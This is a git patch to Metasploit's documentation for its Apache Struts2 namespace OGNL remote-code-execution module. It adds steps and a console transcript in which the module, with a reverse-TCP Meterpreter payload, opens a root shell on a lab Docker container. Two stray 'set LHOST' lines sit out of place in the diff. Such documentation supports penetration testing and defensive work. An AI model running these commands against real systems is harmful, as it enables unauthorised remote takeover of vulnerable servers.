From da7a29f7156337bae69efe0873cd119904992551 Mon Sep 17 00:00:00 2001 From: asoto-r7 Date: Fri, 31 Aug 2018 13:57:41 -0500 Subject: [PATCH] Documentation update --- ...space_rce.md => struts2_namespace_ognl.md} | 30 +++++++++++++++++-- 1 file changed, 28 insertions(+), 2 deletions(-) rename documentation/modules/exploit/multi/http/{struts_namespace_rce.md => struts2_namespace_ognl.md} (81%) diff --git a/documentation/modules/exploit/multi/http/struts_namespace_rce.md b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md similarity index 81% rename from documentation/modules/exploit/multi/http/struts_namespace_rce.md rename to documentation/modules/exploit/multi/http/struts2_namespace_ognl.md index 5c6ff21ed2..0650292743 100644 --- a/documentation/modules/exploit/multi/http/struts_namespace_rce.md +++ b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md @@ -50,6 +50,7 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20 ``` 8. Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint: +msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 ``` sudo docker start $CONTAINER_ID ``` @@ -83,7 +84,10 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20 - [ ] You will not be given a shell (yet). Confirm that payload upload and execution works: - - [ ] It doesn't (yet). + - [ ] Set a payload, e.g.: ```set PAYLOAD linux/x64/meterpreter/reverse_tcp``` + - [ ] Configure `LHOST` and `RHOST` as necessary. + - [ ] Run the exploit: ```run``` +msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 ## Options **TARGETURI** @@ -98,7 +102,7 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20 ### Version of software and OS as applicable - Checking a vulnerable endpoint, as installed in the above steps. + Checking a vulnerable endpoint, as installed in the above steps: ``` msf > use exploit/multi/http/struts_namespace_rce @@ -127,3 +131,25 @@ b3d9b350d9b6 [*] Exploit completed, but no session was created. msf5 exploit(multi/http/struts_namespace_rce) > ``` + + Getting a Meterpreter session on the above-described environment: + +``` + +msf5 > use exploit/multi/http/struts2_namespace_ognl +msf5 exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action +msf5 exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135 +msf5 exploit(multi/http/struts2_namespace_ognl) > set RPORT 32771 +msf5 exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 +msf5 exploit(multi/http/struts2_namespace_ognl) > run + +[*] Started reverse TCP handler on 192.168.199.134:4444 +[+] Target profiled successfully: Linux 4.4.0-112-generic amd64, running as root +[+] Payload successfully dropped and executed. +[*] Sending stage (816260 bytes) to 192.168.199.135 +[*] Meterpreter session 1 opened (192.168.199.134:4444 -> 192.168.199.135:47482) at 2018-08-31 13:15:22 -0500 + +meterpreter > +``` +